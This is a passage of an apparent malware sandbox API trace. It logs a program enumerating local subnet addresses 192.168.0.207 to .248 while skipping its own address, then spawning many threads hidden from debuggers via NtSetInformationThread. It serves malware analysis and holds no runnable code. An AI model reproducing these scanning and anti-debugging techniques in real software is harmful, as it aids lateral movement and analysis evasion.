RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073d48 | out: ListHead=0x1fa03e8, ListEntry=0x2073d48) returned 0x2073d20 [0089.921] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.207") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.207") returned -1 [0089.921] malloc (_Size=0x1c) returned 0x2073d70 [0089.921] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073d70 | out: ListHead=0x1fa03e8, ListEntry=0x2073d70) returned 0x2073d48 [0089.921] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.208") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.208") returned -1 [0089.921] malloc (_Size=0x1c) returned 0x2073d98 [0089.921] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073d98 | out: ListHead=0x1fa03e8, ListEntry=0x2073d98) returned 0x2073d70 [0089.921] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.209") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.209") returned -1 [0089.921] malloc (_Size=0x1c) returned 0x2073dc0 [0089.921] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073dc0 | out: ListHead=0x1fa03e8, ListEntry=0x2073dc0) returned 0x2073d98 [0089.921] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.210") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.210") returned -1 [0089.921] malloc (_Size=0x1c) returned 0x2073de8 [0089.921] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073de8 | out: ListHead=0x1fa03e8, ListEntry=0x2073de8) returned 0x2073dc0 [0089.921] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.211") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.211") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073e10 [0089.922] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073e10 | out: ListHead=0x1fa03e8, ListEntry=0x2073e10) returned 0x2073de8 [0089.922] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.212") returned 13 [0089.922] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.212") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073e38 [0089.922] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073e38 | out: ListHead=0x1fa03e8, ListEntry=0x2073e38) returned 0x2073e10 [0089.922] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.213") returned 13 [0089.922] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.213") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073e60 [0089.922] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073e60 | out: ListHead=0x1fa03e8, ListEntry=0x2073e60) returned 0x2073e38 [0089.922] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.214") returned 13 [0089.922] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.214") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073e88 [0089.922] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073e88 | out: ListHead=0x1fa03e8, ListEntry=0x2073e88) returned 0x2073e60 [0089.922] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.215") returned 13 [0089.922] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.215") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073eb0 [0089.922] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073eb0 | out: ListHead=0x1fa03e8, ListEntry=0x2073eb0) returned 0x2073e88 [0089.922] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.216") returned 13 [0089.922] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.216") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073ed8 [0089.922] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073ed8 | out: ListHead=0x1fa03e8, ListEntry=0x2073ed8) returned 0x2073eb0 [0089.922] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.217") returned 13 [0089.922] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.217") returned -1 [0089.922] malloc (_Size=0x1c) returned 0x2073f00 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073f00 | out: ListHead=0x1fa03e8, ListEntry=0x2073f00) returned 0x2073ed8 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.218") returned 13 [0089.923] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.218") returned -1 [0089.923] malloc (_Size=0x1c) returned 0x1fb18d8 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb18d8 | out: ListHead=0x1fa03e8, ListEntry=0x1fb18d8) returned 0x2073f00 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.219") returned 13 [0089.923] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.219") returned -1 [0089.923] malloc (_Size=0x1c) returned 0x1fb1900 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1900 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1900) returned 0x1fb18d8 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.220") returned 13 [0089.923] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.220") returned -1 [0089.923] malloc (_Size=0x1c) returned 0x1fb1928 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1928 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1928) returned 0x1fb1900 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.221") returned 13 [0089.923] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.221") returned -1 [0089.923] malloc (_Size=0x1c) returned 0x1fb1950 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1950 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1950) returned 0x1fb1928 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.222") returned 13 [0089.923] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.222") returned -1 [0089.923] malloc (_Size=0x1c) returned 0x1fb1978 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1978 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1978) returned 0x1fb1950 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.223") returned 13 [0089.923] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.223") returned -1 [0089.923] malloc (_Size=0x1c) returned 0x1fb19a0 [0089.923] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb19a0 | out: ListHead=0x1fa03e8, ListEntry=0x1fb19a0) returned 0x1fb1978 [0089.923] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.224") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.224") returned -1 [0089.924] malloc (_Size=0x1c) returned 0x1fb19c8 [0089.924] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb19c8 | out: ListHead=0x1fa03e8, ListEntry=0x1fb19c8) returned 0x1fb19a0 [0089.924] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.225") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.225") returned -1 [0089.924] malloc (_Size=0x1c) returned 0x1fb19f0 [0089.924] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb19f0 | out: ListHead=0x1fa03e8, ListEntry=0x1fb19f0) returned 0x1fb19c8 [0089.924] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.226") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.226") returned -1 [0089.924] malloc (_Size=0x1c) returned 0x1fb1a18 [0089.924] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1a18 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1a18) returned 0x1fb19f0 [0089.924] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.227") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.227") returned -1 [0089.924] malloc (_Size=0x1c) returned 0x1fb1a40 [0089.924] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1a40 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1a40) returned 0x1fb1a18 [0089.924] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.228") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.228") returned -1 [0089.924] malloc (_Size=0x1c) returned 0x1fb1a68 [0089.924] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1a68 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1a68) returned 0x1fb1a40 [0089.924] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.229") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.229") returned -1 [0089.924] malloc (_Size=0x1c) returned 0x1fb1a90 [0089.924] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1a90 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1a90) returned 0x1fb1a68 [0089.924] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.230") returned 13 [0089.924] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.230") returned -1 [0089.925] malloc (_Size=0x1c) returned 0x1fb1ab8 [0089.925] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1ab8 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1ab8) returned 0x1fb1a90 [0089.925] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.231") returned 13 [0089.925] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.231") returned -1 [0089.925] malloc (_Size=0x1c) returned 0x1fb1ae0 [0089.925] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1ae0 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1ae0) returned 0x1fb1ab8 [0089.925] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.232") returned 13 [0089.925] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.232") returned -1 [0089.925] malloc (_Size=0x1c) returned 0x1fb1b08 [0089.925] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1b08 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1b08) returned 0x1fb1ae0 [0089.925] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.233") returned 13 [0089.925] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.233") returned -1 [0089.925] malloc (_Size=0x1c) returned 0x1fb1b30 [0089.925] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1b30 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1b30) returned 0x1fb1b08 [0089.925] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.234") returned 13 [0089.925] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.234") returned -1 [0089.925] malloc (_Size=0x1c) returned 0x1fb1b58 [0089.925] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1b58 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1b58) returned 0x1fb1b30 [0089.925] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.235") returned 13 [0089.925] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.235") returned -1 [0089.925] malloc (_Size=0x1c) returned 0x1fb1b80 [0089.925] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1b80 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1b80) returned 0x1fb1b58 [0089.925] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.236") returned 13 [0089.925] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.236") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1ba8 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1ba8 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1ba8) returned 0x1fb1b80 [0089.926] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.237") returned 13 [0089.926] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.237") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1bd0 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1bd0 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1bd0) returned 0x1fb1ba8 [0089.926] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.238") returned 13 [0089.926] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.238") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1bf8 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1bf8 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1bf8) returned 0x1fb1bd0 [0089.926] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.239") returned 13 [0089.926] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.239") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1c20 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1c20 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1c20) returned 0x1fb1bf8 [0089.926] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.240") returned 13 [0089.926] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.240") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1c48 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1c48 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1c48) returned 0x1fb1c20 [0089.926] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.241") returned 13 [0089.926] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.241") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1c70 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1c70 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1c70) returned 0x1fb1c48 [0089.926] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.242") returned 13 [0089.926] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.242") returned -1 [0089.926] malloc (_Size=0x1c) returned 0x1fb1c98 [0089.926] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1c98 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1c98) returned 0x1fb1c70 [0089.927] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.243") returned 13 [0089.927] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.243") returned -1 [0089.927] malloc (_Size=0x1c) returned 0x1fb1cc0 [0089.927] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1cc0 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1cc0) returned 0x1fb1c98 [0089.927] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.244") returned 13 [0089.927] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.244") returned -1 [0089.927] malloc (_Size=0x1c) returned 0x1fb1ce8 [0089.927] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1ce8 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1ce8) returned 0x1fb1cc0 [0089.927] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.245") returned 13 [0089.927] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.245") returned -1 [0089.927] malloc (_Size=0x1c) returned 0x1fb1d10 [0089.927] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1d10 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1d10) returned 0x1fb1ce8 [0089.927] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.246") returned 13 [0089.927] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.246") returned -1 [0089.927] malloc (_Size=0x1c) returned 0x1fb1d38 [0089.927] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1d38 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1d38) returned 0x1fb1d10 [0089.927] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.247") returned 13 [0089.927] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.247") returned -1 [0089.927] malloc (_Size=0x1c) returned 0x1fb1d60 [0089.927] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1d60 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1d60) returned 0x1fb1d38 [0089.927] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.248") returned 13 [0089.927] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.248") returned -1 [0089.927] malloc (_Size=0x1c) returned 0x1fb1d88 [0089.927] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1d88 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1d88) returned 0x1fb1d60 [0089.928] malloc (_Size=0x1c) returned 0x1fb1db0 [0089.928] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fb1db0 | out: ListHead=0x1fa03e8, ListEntry=0x1fb1db0) returned 0x1fb1d88 [0089.928] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x34c, lpBytesBuffer=0x0) returned 0x0 [0089.929] NtSetInformationThread (ThreadHandle=0x34c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.929] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3d4, lpBytesBuffer=0x0) returned 0x0 [0089.930] NtSetInformationThread (ThreadHandle=0x3d4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.930] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3d8, lpBytesBuffer=0x0) returned 0x0 [0089.930] NtSetInformationThread (ThreadHandle=0x3d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.930] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3dc, lpBytesBuffer=0x0) returned 0x0 [0089.931] NtSetInformationThread (ThreadHandle=0x3dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.931] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3e0, lpBytesBuffer=0x0) returned 0x0 [0089.931] NtSetInformationThread (ThreadHandle=0x3e0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.932] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3e4, lpBytesBuffer=0x0) returned 0x0 [0089.932] NtSetInformationThread (ThreadHandle=0x3e4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.932] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3e8, lpBytesBuffer=0x0) returned 0x0 [0089.933] NtSetInformationThread (ThreadHandle=0x3e8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.933] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3ec, lpBytesBuffer=0x0) returned 0x0 [0089.934] NtSetInformationThread (ThreadHandle=0x3ec, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.934] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3f0, lpBytesBuffer=0x0) returned 0x0 [0089.934] NtSetInformationThread (ThreadHandle=0x3f0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.934] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3f4, lpBytesBuffer=0x0) returned 0x0 [0089.935] NtSetInformationThread (ThreadHandle=0x3f4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.935] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3f8, lpBytesBuffer=0x0) returned 0x0 [0089.936] NtSetInformationThread (ThreadHandle=0x3f8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.936] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3fc, lpBytesBuffer=0x0) returned 0x0 [0089.937] NtSetInformationThread (ThreadHandle=0x3fc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.937] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x404, lpBytesBuffer=0x0) returned 0x0 [0089.938] NtSetInformationThread (ThreadHandle=0x404, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.938] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x408, lpBytesBuffer=0x0) returned 0x0 [0089.938] NtSetInformationThread (ThreadHandle=0x408, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.939] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x40c, lpBytesBuffer=0x0) returned 0x0 [0089.939] NtSetInformationThread (ThreadHandle=0x40c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.939] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x410, lpBytesBuffer=0x0) returned 0x0 [0089.940] NtSetInformationThread (ThreadHandle=0x410, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.940] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x414, lpBytesBuffer=0x0) returned 0x0 [0089.941] NtSetInformationThread (ThreadHandle=0x414, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.941] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | 